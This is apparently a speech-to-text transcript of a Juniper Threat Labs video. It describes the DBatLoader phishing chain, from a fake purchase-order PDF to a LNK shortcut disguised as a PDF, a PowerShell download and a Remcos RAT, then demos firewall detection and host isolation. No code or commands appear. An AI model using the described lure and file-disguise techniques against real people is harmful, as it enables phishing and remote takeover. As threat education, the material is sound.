DBatLoader Malware Juniper Threat Labs Attack Demo

0:00 welcome to the Juniper threat Labs

0:02 attack demo series today's subject is

0:04 D-BAT loader malware this video will

0:07 demonstrate how malicious threat actors

0:08 conduct this multi-stage malware attack

0:10 but let's begin first with an

0:13 introduction to D-BAT loader malware

0:15 D-BAT loader is a malicious Windows

0:17 executable PE file with the dot exe

0:19 extension it's particularly dangerous as

0:21 it loads other malware such as form book

0:23 a family of data stealing malware in the

0:26 example you're about to see rather than

0:28 download form book malware debate loader

0:30 instead downloads a remote access Trojan

0:32 or rap rats are malware that permit

0:34 attackers to remotely control the

0:36 infected victim's PC some of the rats

0:38 loaded by D-BAT loader malware include

0:41 remco's rat and net wire wrap in this

0:44 particular attack you will see D-BAT

0:46 loader malware download the remco's wrap

0:49 Additionally the threat actors behind

0:51 this campaign were found to be abusing

0:53 the public Cloud infrastructure

0:55 D-BAT loader malware currently targets

0:57 European companies and uses phishing

0:59 emails to lure its victims the emails

1:02 are deceptive and that they appear to

1:04 come from legitimate companies perhaps

1:06 with which the targeted victim company

1:08 may do business and or may wrongly think

1:11 is the authentic actual company as you

1:14 can see from the attack chain unlike our

1:16 most recent video about Royal ransomware

1:18 D-BAT loader malware has multiple stages

1:21 which help it to hide from some

1:23 detection engines

1:25 the first stage is a phishing campaign

1:27 it begins with an email sent to the

1:29 prospective victim usually about a

1:30 purchase order the email contains a PDF

1:33 attachment that looks like an invoice

1:34 but is actually an image with a

1:36 hyperlink that reads view secured

1:39 document in all caps in the center of

1:41 the dock clicking that results in the

1:44 victim downloading the next stage of the

1:45 attack the malware then downloads a

1:48 cabinet file in the cab file is what to

1:51 the unsuspecting user looks to be

1:53 another PDF this time with the revised

1:55 order but it's not a PDF at all instead

1:58 it's a link file or lnk file disguised

2:02 as a PDF

2:03 link files are Microsoft Windows

2:05 shortcuts they point to another file

2:07 folder or application

2:09 when the lnk file is clicked or

2:11 extracted in this case

2:13 the lek file disguises a PDF because of

2:16 the double extension downloads the D-BAT

2:19 loader executable I.E the next stage and

2:22 executes it with Powershell inside this

2:25 executable is the remco's rat which when

2:27 run injects this rat into the victim

2:29 system's memory

2:31 now with the background on dbat loader

2:33 malware out of the way next up in this

2:35 video Juniper threat Labs demonstrates

2:37 all of the stages of this attack

2:39 afterward if a system were to be

2:41 compromised such as buy a zero day

2:43 attack

2:44 let's say such as when the D-BAT loader

2:47 first appeared in the wild

2:48 Juniper makes it easy for its customers

2:50 to provide protection for the rest of

2:52 the network

2:53 we'll show you how you can detect block

2:55 and isolate an infected system using a

2:57 juniper SRX firewall with ATP cloud

3:01 let's get started we're demonstrating

3:04 this attack in a contained environment

3:05 to show how it works the victim here

3:08 received a phishing email from the

3:09 malicious threat actor with an

3:11 attachment entitled revised order

3:14 document.pdf

3:16 the malicious threat actor used a real

3:18 company in the email footer so we are

3:20 obscuring that from view we start

3:22 Wireshark and process monitor to show

3:24 you the network activity and process

3:26 activity on the victim system

3:32 when the unsuspecting victim opens the

3:35 PDF attachment it looks like he or she

3:37 has received a valid purchase order the

3:40 user is duped into believing that in

3:42 order to view the actual secured

3:44 document he or she must click on view

3:46 secured document

3:48 [Music]

3:55 as soon as the user clicks this the

3:57 malware goes to that URL and downloads

4:00 revised underscore order underscore

4:02 document.cab this cabinet file contains

4:05 an lnk file inside it disguised as a PDF

4:09 foreign

4:13 [Music]

4:27 is viewing file names it appears to have

4:29 a PDF extension but it doesn't notice

4:32 under the file name Windows indicates

4:34 the file is a quote unquote shortcut

4:36 when the victim unwittingly opens the

4:39 file he or she is prompted to extract

4:41 the file in this case the victim decides

4:43 to extract the file to the downloads

4:45 folder

4:46 navigating to the downloads folder the

4:48 victim user double clicks the extracted

4:50 file because it is a link file rather

4:53 than a PDF the contents of the link file

4:55 instruct the victim system to run a

4:57 Powershell command that downloads and

4:59 installs dbat loader in the process

5:01 monitor you can see Powershell here is

5:04 running

5:07 and here too in process monitor

5:09 highlighted in green is the remco's rat

5:11 or remote access Trojan here it is named

5:14 file.exe and for the purposes of

5:16 deception has a PowerPoint icon

5:20 file.exe the remkos rat was run after

5:23 the Powershell script retrieved and ran

5:25 another file

5:27 checking wireshark's output we see both

5:29 files that were downloaded with HTTP get

5:31 requests in this attack the second one

5:34 downloaded with the highlighted long

5:36 unpronounceable name is the dbat loader

5:38 malware

5:39 that once executed injects file.exe aka

5:43 the remco's remote access Trojan into

5:45 the victim's system

5:53 now we will simulate the dbat loader

5:55 malware attack again but this time the

5:57 victim is protected with the Juniper SRX

5:59 firewall in Juniper ATP Cloud even so

6:02 for this part of the video we want to

6:04 demonstrate how Juniper connected

6:06 Security Solutions can detect block and

6:08 isolate an infected system

6:10 in order for us to demonstrate that be

6:12 aware that the malware has to initially

6:14 go undetected for the demo Juniper

6:17 threat Labs is using the following setup

6:19 we have a vsrx picture in the center the

6:22 vsrx is a virtual SRX firewall providing

6:24 network security protection its purpose

6:27 is to inspect Network traffic and with

6:29 the assistance of juniper ATP Cloud to

6:31 detect malware like D-BAT loader in

6:34 addition to the virtual firewall and

6:35 cloud-based protections we're using the

6:37 Juno space security director which is a

6:40 centralized management system

6:42 security director facilitates our

6:44 configuring and monitoring of the vsrx

6:46 firewall and we are using Juniper's Juno

6:49 space policy enforcer as well Juniper's

6:51 Juno space policy enforcer enforces

6:53 security policies on endpoints and

6:55 ensures they comply with corporate

6:57 security standards

6:58 pictured as well are several Windows

7:00 workstations Each of which is connected

7:02 to the vsrx

7:04 there is a Ubuntu Server which is acting

7:06 as the malware download server we will

7:09 be using one of the windows hosts as a

7:11 jump station to connect to the victim's

7:13 host using RDP and from there launching

7:16 the attack

7:17 before we proceed with the D-BAT loader

7:19 attack simulation let's first take a

7:21 look at the threat prevention policy

7:23 that we've set up on our security

7:24 director and applied to the vsrx

7:29 [Music]

7:33 to access the policy we'll navigate to

7:35 the configure Tab and then select threat

7:38 prevention and policies

7:45 as you can see we already have an

7:47 existing policy in place let's further

7:49 inspect the protections being enforced

7:51 by the applied policy for this demo our

7:54 policy is configured to block command

7:56 and control traffic at Threat Level 8

7:57 and above

7:59 we've also set it up to block infected

8:01 hosts at Threat Level 8 and above

8:03 additionally we've configured our policy

8:05 to use ATP Cloud for malware detection

8:08 and as you can see we've elected to scan

8:10 both HTTP downloads and email

8:12 attachments

8:14 finally we've chosen to block any and

8:16 all threats rated at level 7 and above

8:20 this threat prevention policy applied to

8:22 the Juniper vsrx firewall is a critical

8:24 component of our defenses protecting our

8:27 systems against malware related attacks

8:29 including D-BAT loader it allows us to

8:31 detect and block malicious traffic as

8:33 well as the activity of potentially

8:36 infected hosts which will then prevent

8:38 the spread of malware throughout our

8:39 Network in the event that one of our

8:41 systems gets compromised

8:44 acting as would-be malicious threat

8:46 actors for the demo we now connect to

8:48 the victim system vrdp

8:59 to confirm that we have internet

9:01 connectivity we visit Wikipedia and

9:03 YouTube

9:05 [Music]

9:15 later we will show you that once the

9:17 vsrx has identified this host as being

9:19 infected it will then be isolated from

9:21 the network once that occurs this

9:23 infected host will be prevented by the

9:25 Juniper connected Security Solutions

9:27 from using the internet connection

9:33 recall that for the attack the targeted

9:35 victim was sent a phishing email with a

9:37 PDF attachment

9:38 in opening the victim's email here it is

9:44 next we start Wireshark to show the

9:46 network activity specifically we will

9:49 want to look at the HTTP activity which

9:51 will show the malicious file downloads

9:57 thank you

9:59 [Music]

10:03 simulating the victim we open the

10:06 malicious PDF attachment we then click

10:09 on the malicious URL on the file

10:11 and when we do it downloads the cabinet

10:14 file

10:23 the victim then extracts the file inside

10:25 which is a link file the lnk file

10:28 disguised as a PDF

10:47 as soon as we double click on the

10:49 malicious link file which invokes

10:51 Powershell the malware downloads the

10:53 malicious D-BAT loader executable

10:56 let's check this out in Wireshark

10:59 the bottom most HTTP get request shows

11:02 the effect of clicking on the lnk file

11:04 disguised as a PDF namely the retrieval

11:07 of D-BAT loader

11:09 though there was no sandbox analysis

11:11 performed at any stage of the attack

11:13 sequence and had there been then we

11:15 wouldn't have gotten this far even so at

11:17 this point Juniper SRX with the help of

11:19 ATP

11:20 has detected the attack to show that the

11:23 attack was detected by SRX we go over to

11:25 our security director from the monitor

11:28 tab we click on threat prevention and

11:30 then HTTP file download

11:34 doing that we see that there was a file

11:35 downloaded from

11:37 silverline.com.sg that was detected at

11:39 Threat Level 10.

11:42 you may recognize that file name by now

11:44 as you have seen it several times in

11:46 this video that's the D-BAT loader

11:48 malware executable

11:50 by clicking on that row we can view

11:52 detailed information about this malware

11:53 including static analysis to Juniper

11:56 performs on the malware

11:58 [Music]

12:01 we also see Behavior Analysis

12:04 and

12:09 network activity

12:11 as we'd said earlier D-BAT loader is

12:13 making use of the public Cloud

12:15 infrastructure this here is a Microsoft

12:17 owned IP address

12:19 thank you and security director we can

12:22 also see the malware's behavior details

12:27 and we can look at the miter attack

12:29 vectors that it uses

12:34 [Music]

12:41 next and again using Juno space security

12:43 director this time we'll look at the ATP

12:45 Cloud host tab here we can show you that

12:48 the infected victim system has been

12:50 added to the set of infected hosts as

12:52 the host was identified at Threat Level

12:54 9.

12:56 clicking in on the host we can learn

12:58 more earlier recall that we'd configured

13:01 the vsrx to block hosts at Threat Level

13:03 8 and above that explains why the vsrx

13:06 smartly blocked this infected host in

13:09 this case Juniper security director

13:10 tells the security admin that it was

13:12 blocked as a result of a malicious file

13:14 download

13:25 if we go back to our victim host you can

13:27 see that it no longer has internet

13:28 connectivity

13:35 foreign

14:08 [Music]

14:12 once we're sure that the devat loader

14:14 infected host is free from infection

14:16 we'll want to restore the infected

14:18 system back to the network

14:20 to do so we go to security director and

14:23 click on the infected host

14:25 to the right of the investigation status

14:27 we select resolved fixed

14:30 afterwards the host status is now clean

14:33 and the host is connected once again to

14:36 the network enabled operate as before

14:58 now that the infection has been resolved

15:01 we can verify that the host is back

15:02 online by pinging systems on the

15:04 internet and by visiting sites like

15:06 YouTube through the browser both of

15:09 which demonstrate restored connectivity

15:14 [Music]

15:17 that completes our demo of D-BAT loader

15:19 malware check out more videos from the

15:20 Juniper threat Labs attack demo series

15:22 by visiting juniper.net thanks for

15:24 watching